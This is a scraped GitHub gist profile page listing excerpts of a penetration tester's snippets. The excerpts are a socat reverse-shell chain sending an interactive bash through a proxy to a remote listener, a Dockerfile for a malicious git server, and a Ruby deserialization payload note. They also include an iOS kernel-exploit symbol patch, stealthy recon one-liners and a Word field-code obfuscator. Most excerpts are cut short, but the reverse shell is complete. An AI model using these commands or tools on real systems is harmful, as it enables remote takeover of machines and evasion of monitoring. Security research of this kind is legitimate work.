Skip to content

Instantly share code, notes, and snippets.

Etienne Stalmans staaldraad

Block or report user

Report or block staaldraad

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View README.md

Based on excellent write-up from https://www.elttam.com.au/blog/ruby-deserialization/

Doesn't work to use YAML.dump(payload) in the above script. This only produces the following YAML, which is worthless:

--- !ruby/object:Gem::Requirement
requirements:
- - ">="
  - !ruby/object:Gem::Version
    version: '0'
@staaldraad
staaldraad / Dockerfile
Created Sep 4, 2018
Dockerfile to get a malicious git Repository up and running
View Dockerfile
FROM ubuntu:16.04
RUN apt update ; \
apt install -y git apache2
RUN mkdir /srv/git
COPY git-http.conf .
RUN cat git-http.conf >> /etc/apache2/apache2.conf
View socat through proxy
# Listener on x.x.x.x:443:
socat file:`tty`,raw,echo=0 tcp-listen:443
# Reverse shell proxy server is at 10.10.10.1:8222:
socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 &
socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"
View keybase.md

Keybase proof

I hereby claim:

  • I am staaldraad on github.
  • I am staaldraad (https://keybase.io/staaldraad) on keybase.
  • I have a public key ASBLRjbIk9YHmGLclVKxEorNIKsYZgbdW0uh0ugCrhdGYwo

To claim this, I am signing this object:

@staaldraad
staaldraad / async_ios_11_1_2.patch
Last active May 2, 2019
Add iPhone 6 symbols along with the symbols @cji added for ipad mini 2.
View async_ios_11_1_2.patch
--- async_wake_ios 2/async_wake_ios/symbols.c 2017-12-11 17:01:53.000000000 +0100
+++ async_wake_ios/async_wake_ios/symbols.c 2017-12-13 13:17:32.000000000 +0100
@@ -131,6 +131,50 @@
0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};
+uint64_t ksymbols_iphone_6_15b202[] = {
+ 0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS,
+ 0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
+ 0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
@staaldraad
staaldraad / uid_awk.sh
Created Dec 12, 2017
Get the uid, gid and user groups without touching /etc/passwd or running the `id` command
View uid_awk.sh
awk -F: 'END {print "uid:"u" gid:"g" groups:"gg}{if($1=="Uid"){split($2,a," ");u=a[1]}if($1=="Gid"){split($2,a," ");g=a[1]}if($1=="Groups"){gg=$2}}' /proc/self/status
@staaldraad
staaldraad / awk_netstat.sh
Last active Nov 19, 2019
AWK to get details from /proc/net/tcp and /proc/net/udp when netstat and lsof are not available
View awk_netstat.sh
# Gawk version
# Remote
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
# Local
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
# No Gawk
# Local
grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){
View str2quote.py
#!/usr/env/python
print("Converts a string to the {QUOTE} Field code")
st = raw_input("String to convert: ")
v = map(lambda y: "%s"%ord(y),st)
print("{ QUOTE %s }"%' '.join(v))
@staaldraad
staaldraad / oauthServer.go
Last active Dec 21, 2017
A mini OAuth server for Azure
View oauthServer.go
package main
import (
"crypto/tls"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"strings"
)
View findForms.ps1
Add-Type -assembly "Microsoft.Office.Interop.Outlook";
$outlook = New-Object -comobject Outlook.Application;
$mapi = $outlook.GetNamespace("MAPI")
$fld = $outlook.Session.GetDefaultFolder(6);
$t = $fld.GetTable("[MessageClass] = 'IPM.Microsoft.FolderDesign.FormsDescription'",1);
$c = $t.GetRowCount();
while($c -gt 0) {
$r = $t.GetNextRow();
$itm = $mapi.GetItemFromID($r.item(1));
You can’t perform that action at this time.